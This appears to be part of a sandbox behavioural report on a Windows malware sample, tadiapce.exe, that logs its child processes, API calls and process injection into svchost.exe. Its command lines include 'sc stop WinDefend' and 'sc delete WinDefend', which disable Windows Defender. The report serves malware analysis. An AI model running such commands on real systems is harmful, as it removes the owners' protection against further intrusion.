File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data

Process #29: cmd.exe

Information	Value
ID	#29
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c sc delete WinDefend
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:24, Reason: Child Process
Unmonitor	End Time: 00:01:26, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0x394
Parent PID	0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x 878

Threads

Thread 0x878

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:31:34 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10932628	1	Fn
System	Get Time	type = Performance Ctr, time = 15904049107	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a580000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 208, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\sc.exe, os_pid = 0x9a0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000424	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #30: sc.exe

Information	Value
ID	#30
File Name	c:\windows\system32\sc.exe
Command Line	sc stop WinDefend
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:25, Reason: Child Process
Unmonitor	End Time: 00:01:26, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0x8a0
Parent PID	0x7dc (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x 98C 0x 994

Threads

Thread 0x98c

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:31:34 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10932659	1	Fn
System	Get Time	type = Performance Ctr, time = 15907162426	1	Fn
Module	Get Handle	module_name = c:\windows\system32\sc.exe, base_address = 0x2d0000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 98	1	Fn Data

Process #31: sc.exe

Information	Value
ID	#31
File Name	c:\windows\system32\sc.exe
Command Line	sc delete WinDefend
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:25, Reason: Child Process
Unmonitor	End Time: 00:01:26, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0x9a0
Parent PID	0x394 (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x 9A4 0x 9A8

Threads

Thread 0x9a4

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:31:34 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10932721	1	Fn
System	Get Time	type = Performance Ctr, time = 15912605200	1	Fn
Module	Get Handle	module_name = c:\windows\system32\sc.exe, base_address = 0x2d0000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 98	1	Fn Data

Process #33: svchost.exe

Information	Value
ID	#33
File Name	c:\windows\system32\svchost.exe
Command Line	svchost.exe
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:02:33, Reason: Child Process
Unmonitor	End Time: 00:02:34, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0x4d8
Parent PID	0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9E8

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x50000, size = 367	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x60000, size = 112	61	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x602104, size = 12	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10000000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10001000, size = 10240	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004000, size = 3584	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10005000, size = 1004	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10005000, size = 512	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10006000, size = 1024	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 26	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 12	7	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 17	7	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 16	45	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004018, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 14	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000401c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 15	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004020, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 20	6	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004024, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 9	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004028, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000402c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 12	5	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004030, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 10	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004034, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004038, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000403c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 25	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004040, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 18	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004044, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004048, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 24	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000404c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004050, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 19	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004054, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 13	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004058, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000405c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 27	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004060, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 6	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004064, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004068, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 28	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000406c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004000, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004004, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004008, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000400c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004010, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 21	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040c8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040cc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040d0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040d4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040d8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 16	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004080, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004084, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004088, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000408c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 22	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000409c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040a0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 11	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040a4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040a8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 5	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040ac, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 7	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040b0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040b4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040b8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040bc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040c0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004094, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004074, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004078, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x140000, size = 388	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x150000, size = 40	1	Fn Data

Threads

Thread 0x9e8

Category	Operation	Information	Count	Logfile
Module	Load	module_name = KERNEL32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleW, address_out = 0x76b6374d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetVersionExW, address_out = 0x76b53b1a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76b6450e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x76b5bbd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x76b61280	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x7739ff51	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x77382dd6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x76b5d9e8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x76b5cf41	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76b6ed38	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x76b5cdcf	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TerminateProcess, address_out = 0x76b52331	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76b62fde	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76b5cac4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76b5bb80	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTickCount, address_out = 0x76b5ba60	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76b5bb9f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InterlockedCompareExchange, address_out = 0x76b5bb92	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x76b5ba46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InterlockedExchange, address_out = 0x76b5bf0a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76b63d01	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x774c0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegEnumKeyExW, address_out = 0x774d46c8	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExW, address_out = 0x774d468d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExW, address_out = 0x774d46ad	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x774d469d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x774d46e7	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x76cd0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoInitializeSecurity, address_out = 0x76cf7259	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x76d19d0b	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoSetProxyBlanket, address_out = 0x76ce5ea5	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoUninitialize, address_out = 0x76d186d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoInitializeEx, address_out = 0x76d109ad	1	Fn
Module	Load	module_name = OLEAUT32.dll, base_address = 0x76a60000	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 12, address_out = 0x76a65dee	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 7, address_out = 0x76a64680	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 9, address_out = 0x76a63eae	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 2, address_out = 0x76a64642	1	Fn
Module	Load	module_name = msvcrt.dll, base_address = 0x76f80000	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _except_handler4_common, address_out = 0x76fa3e27	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = ??2@YAPAXI@Z, address_out = 0x76f8b0c9	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _amsg_exit, address_out = 0x76feb2ef	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _initterm, address_out = 0x76f8c151	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = free, address_out = 0x76f89894	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = malloc, address_out = 0x76f89cee	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _XcptFilter, address_out = 0x76fadc75	1	Fn
